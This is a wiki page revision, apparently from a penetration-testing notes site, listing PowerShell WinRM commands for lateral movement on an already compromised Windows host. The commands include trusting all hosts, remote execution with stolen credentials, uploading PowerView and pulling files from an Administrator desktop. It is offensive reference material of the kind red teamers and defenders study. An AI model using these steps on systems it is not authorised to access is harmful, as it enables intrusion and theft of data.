(Created page with "category: Lateral Movement") |
No edit summary |
||
| Line 1: | Line 1: | ||
== Commands<ref>https://www.ired.team/offensive-security/lateral-movement/t1028-winrm-for-lateral-movement</ref> == | |||
[[category: Lateral Movement]] | [[category: Lateral Movement]] | ||
<syntaxhighlight lang="powershell"> | |||
# Enable PowerShell Remoting on the target (box needs to be compromised first) | |||
Enable-PSRemoting -force | |||
# Check if a given system is listening on WinRM port | |||
Test-NetConnection <IP> -CommonTCPPort WINRM | |||
# Trust all hosts: | |||
Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force | |||
# Check what hosts are trusted | |||
Get-Item WSMan:\localhost\Client\TrustedHosts | |||
# Execute command on remote host | |||
Invoke-Command <host> -Credential $cred -ScriptBlock {Hostname} | |||
# Interactive session with explicit credentials | |||
Enter-PSSession <host> -Credential <domain>\<user> | |||
# Interactive session using Kerberos: | |||
Enter-PSSession <host> -Authentication Kerberos | |||
# Upload file to remote session | |||
Copy-Item -Path C:\Temp\PowerView.ps1 -Destination C:\Temp\ -ToSession (Get-PSSession) | |||
# Download file from remote session | |||
Copy-Item -Path C:\Users\Administrator\Desktop\test.txt -Destination C:\Temp\ -FromSession (Get-PSSession) | |||
</syntaxhighlight> | |||
<references /> | |||
Latest revision as of 23:05, 18 March 2023
Commands[1]
# Enable PowerShell Remoting on the target (box needs to be compromised first)
Enable-PSRemoting -force
# Check if a given system is listening on WinRM port
Test-NetConnection <IP> -CommonTCPPort WINRM
# Trust all hosts:
Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force
# Check what hosts are trusted
Get-Item WSMan:\localhost\Client\TrustedHosts
# Execute command on remote host
Invoke-Command <host> -Credential $cred -ScriptBlock {Hostname}
# Interactive session with explicit credentials
Enter-PSSession <host> -Credential <domain>\<user>
# Interactive session using Kerberos:
Enter-PSSession <host> -Authentication Kerberos
# Upload file to remote session
Copy-Item -Path C:\Temp\PowerView.ps1 -Destination C:\Temp\ -ToSession (Get-PSSession)
# Download file from remote session
Copy-Item -Path C:\Users\Administrator\Desktop\test.txt -Destination C:\Temp\ -FromSession (Get-PSSession)